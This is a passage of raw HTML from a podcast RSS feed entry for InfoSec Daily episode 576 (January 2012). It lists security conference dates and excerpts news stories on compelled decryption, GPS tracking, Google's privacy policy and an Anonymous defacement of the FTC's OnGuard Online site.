	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Judge Robert Blackburn ordered a Peyton, Colo., woman to decrypt the hard drive of a Toshiba laptop computer no later than February 21&#8211;or face the consequences including contempt of court.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Blackburn, a George W. Bush appointee, ruled that the Fifth Amendment posed no barrier to his decryption order. The Fifth Amendment says that nobody may be &quot;compelled in any criminal case to be a witness against himself,&quot; which has become known as the right to avoid self-incrimination.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I find and conclude that the Fifth Amendment is not implicated by requiring production of the unencrypted contents of the Toshiba Satellite M305 laptop computer,&quot; Blackburn wrote in a 10-page opinion today. He said the All Writs Act, which dates back to 1789 and has been used to require telephone companies to aid in surveillance, could be invoked in forcing decryption of hard drives as well.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ramona Fricosu, who is accused of being involved in a mortgage scam, has declined to decrypt a laptop encrypted with Symantec&#39;s PGP Desktop that the FBI found in her bedroom during a raid of a home she shared with her mother and children (and whether she&#39;s even able to do so is not yet clear).</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2012/01/23/freetard_sopa_fail/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/23/freetard_sopa_fail/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Angry copyfighters barraged a small Scottish food certification agency with abuse last week &#8211; in the belief they were protesting against hated US anti-piracy legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Scottish Organic Producers Association &#8211; whose website is at</span><a href="http://www.sopa.org.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">sopa.org.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; was perplexed when it found itself on the receiving of dozens of nasty and illiterate emails.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Remarkably, nothing about the site&#39;s design &#8211; including pictures of sheep, vegetables, Angus cattle and fruit &#8211; did anything to suggest to the furious freetards that they&#39;d got the wrong SOPA &#8211; or that something might be not quite right.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.eweek.com/c/a/Mobile-and-Wireless/Supreme-Court-Ban-on-Warrantless-GPS-Tracking-has-Wider-Implications-212536/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Mobile-and-Wireless/Supreme-Court-Ban-on-Warrantless-GPS-Tracking-has-Wider-Implications-212536/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A U.S. Supreme Court decision released on Jan. 23 will have a significant impact on how law enforcement officers can use GPS technology to track criminal suspects in a wide variety of cases.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In this case, the use of a GPS location device attached to the bottom of a car driven by a suspect allegedly to conduct drug deals was considered a violation of the suspect&rsquo;s Fourth Amendment rights under the U.S. Constitution. But in some ways the case raises more questions than it answers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The case in question was the conviction of Antoine Jones for drug trafficking. The police asked for and received a warrant for the GPS tracking in the District of Columbia good for 10 days. However, the police didn&rsquo;t actually manage to affix the device to the vehicle being used by Jones until 11 days later, in a parking lot in Maryland. The trial court accepted the GPS evidence, which helped locate the place where Jones stored his drugs, but that was overturned on appeal, as was the conviction.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Supreme Court, in deciding the case, took the most narrow possible view. The reasoning behind the decision was that the act of attaching the GPS device after the warrant expired constituted an illegal search. Essentially, the court reasoned that by touching Jones&rsquo; car, the police effectively seized his effects without a warrant, whicThe right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated.&rdquo; All such seizures require a properly sworn warrant issued by a court, the amendment says.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">h is one of the things that the Fourth Amendment says you can&rsquo;t do. The Fourth Amendment says &ldquo;&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.washingtonpost.com/business/technology/google-tracks-consumers-across-products-users-cant-opt-out/2012/01/24/gIQArgJHOQ_story.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.washingtonpost.com/business/technology/google-tracks-consumers-across-products-users-cant-opt-out/2012/01/24/gIQArgJHOQ_story.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; Google said Tuesday it will follow the activities of users across e-mail, search, YouTube and other services, a shift in strategy that is expected to invite greater scrutiny of its privacy and competitive practices.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The information will enable Google to develop a fuller picture of how people use its growing empire of Web sites. Consumers will have no choice but to accept the changes.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The policy will take effect March 1 and will also impact Android mobile phone users, who are required to log in to Google accounts when they activate their phones.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The changes comes as Google is facing stiff competition for the sometimes fleeting attention of Web surfers. It recently disappointed investors for the first time in several quarters, failing last week to meet earnings predictions. Apple, in contrast, reported record earnings Tuesday, blowing past even the most optimistic expectations.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&rsquo;s move appears to be aimed squarely at Apple and Facebook &mdash; titans of the tech industry that have been successful in keeping people within their ecosystem of products. Google, which makes money by selling targeted ads, is hoping to do the same by offering a Web experience tailored to personal tastes.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/24/antisec_sopa_acta_hack/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/24/antisec_sopa_acta_hack/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous and LulzSec members have hacked US government security web site OnGuard Online and defaced it, forcing it offline, in retaliation for the recent MegaUpload takedown and the controversial Anti-Counterfeiting Trade Agreement (ACTA), the groups have announced.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has been ramping up its opposition to ACTA on Twitter via the #ActAgainstACTA hashtag and has been a vocal opponent of the US government&rsquo;s move to silence file-sharing site MegaUpload last week and</span><a href="http://www.theregister.co.uk/2012/01/22/kim_dotcom_panic_room/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">arrest</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the men behind it.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Late on Monday local time,</span><a href="https://twitter.com/#%21/AnonymousIRC/status/161675929649807360"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Anonymous tweeted</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from one of its official accounts that it had hacked the OnGuard Online site, which is managed by the Federal Trade Commission and is similar to the UK&rsquo;s Get Safe Online.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the time it defaced the site with a message, also</span><a href="http://pastebin.com/mJWUDtGD"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted to Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, detailing its beef with the authorities. The site is now down, presumably as its admins work out how to clean it up while addressing the security flaws which made the hack possible in the first place.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;umad? don&#39;t like it when your site is wiped of the internet do you? If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company web sites,&rdquo; the message read.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain&#39;t even trying to step to this.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alongside the message were the email addresses of FTC employees as well as a lengthy log of the hack itself.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack was launched under the banner of the AntiSec campaign waged by members of Anonymous and LulzSec against law enforcement and government agencies since last summer.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-576-encryption-legally-broken-stop-scottish-farmers-no-gps-tracking-no-opt-out-sopaacta-hack/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3412/0/infosec-daily-podcast-episode-576.mp3" length="19076748" type="audio/mpeg" />
		<itunes:duration>0:39:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 576 for January 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
